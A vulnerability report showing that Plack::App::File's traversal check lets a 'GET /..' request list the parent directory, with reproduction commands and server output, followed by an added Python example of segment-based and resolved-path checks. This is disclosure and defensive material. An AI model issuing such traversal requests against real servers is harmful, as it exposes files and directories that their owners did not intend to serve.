Subject: Directory traversal check incomplete
The directory traversal check in Plack::App::File still lets you list
files in the parent directory. I'm not sure of the severity; it looks
like it's probably just information disclosure, but maybe someone who
spends a bit more time can figure out a way to leverage it.
Expected behaviour is a 403; actual behaviour is a listing with the
contents of the parent directory.
$ mkdir -p /tmp/test/in_parent_dir /tmp/test/child /tmp/test/child/childdir
$ cd /tmp/test/child
$ /opt/perl/bin/plackup -MPlack::App::Directory -e 'Plack::App::Directory->new'
HTTP::Server::PSGI: Accepting connections at http://0:5000/
127.0.0.1 - - [16/Nov/2010 04:54:39] "GET /.. HTTP/1.0" 200 1503 "-" "-"
$ telnet localhost 5000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /.. HTTP/1.0
HTTP/1.0 200 OK
<snipped>
<tr><td class='name'><a href='../'>Parent Directory</a></td><td class='size'></td><td class='type'></td><td class='mtime'></td></tr>
<tr><td class='name'><a href='/../.'>./</a></td><td class='size'>4096</td><td class='type'>directory</td><td class='mtime'>Tue, 16 Nov 2010 05:01:36 GMT</td></tr>
<tr><td class='name'><a href='/../..'>../</a></td><td class='size'>4096</td><td class='type'>directory</td><td class='mtime'>Tue, 16 Nov 2010 04:53:43 GMT</td></tr>
<tr><td class='name'><a href='/../child'>child/</a></td><td class='size'>4096</td><td class='type'>directory</td><td class='mtime'>Tue, 16 Nov 2010 05:01:36 GMT</td></tr>
<tr><td class='name'><a href='/../in_parent_dir'>in_parent_dir/</a></td><td class='size'>4096</td><td class='type'>directory</td><td class='mtime'>Tue, 16 Nov 2010 04:53:43 GMT</td></tr>
Relevant line is 43 of Plack::App::File.
The regex is also overly broad; it will reject legitimate paths with ../
in them, for example http://example.com/blog/Some_Title_That_Ends_In../
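The two symptoms in the report (a bare "/.." slipping through and a name that merely ends in ".." being rejected) both come from matching a substring instead of inspecting whole path segments. The following added example is not Plack's code and does not reproduce its actual regex; it is a constructed Python illustration of a substring check that shows both symptoms, beside two checks a defender would use instead: a per-segment test for ".." and a resolved-path test that confirms the final filesystem path still lies under the document root. Function names and the /tmp/test/child root are assumptions taken from the reporter's setup.

```python
import posixpath
from typing import Optional

# Constructed stand-in for a substring-style check (NOT Plack's line 43):
# it only fires when "../" appears, so "/.." with no trailing slash is
# missed, while "Some_Title_That_Ends_In../" is wrongly rejected.
def naive_rejects(path: str) -> bool:
    """Return True if the substring check would reject the request path."""
    return "../" in path


def segment_rejects(path: str) -> bool:
    """Reject only when a whole path segment is exactly '..'.

    Splitting on '/' catches '/..' (no trailing slash needed) and lets
    'Some_Title_That_Ends_In..' through, because that segment is not
    equal to '..'. Run this on the decoded path the server hands you.
    """
    return any(seg == ".." for seg in path.split("/"))


def resolve_under_root(root: str, request_path: str) -> Optional[str]:
    """Map a request path onto the filesystem and confirm it stays under root.

    Returns the resolved path, or None if it would escape the root.
    posixpath is used so the behaviour is the same on every host OS;
    normpath collapses '.', duplicate slashes and '..' segments.
    """
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(
        posixpath.join(root, request_path.lstrip("/"))
    )
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def classify(root: str, request_path: str) -> dict:
    """Run all three checks on one request path, for side-by-side comparison."""
    return {
        "path": request_path,
        "naive_rejects": naive_rejects(request_path),
        "segment_rejects": segment_rejects(request_path),
        "resolved": resolve_under_root(root, request_path),
    }


if __name__ == "__main__":
    # Constructed sample: the reporter's document root and the two paths
    # from the report plus a couple of ordinary requests.
    ROOT = "/tmp/test/child"
    for p in ("/..", "/../in_parent_dir", "/blog/Some_Title_That_Ends_In../",
              "/childdir", "/"):
        print(classify(ROOT, p))
```

The segment check is the fix for the symptom the report describes; the resolved-path check is the belt-and-braces layer, because it does not depend on how the request was spelled, only on where it lands relative to the root.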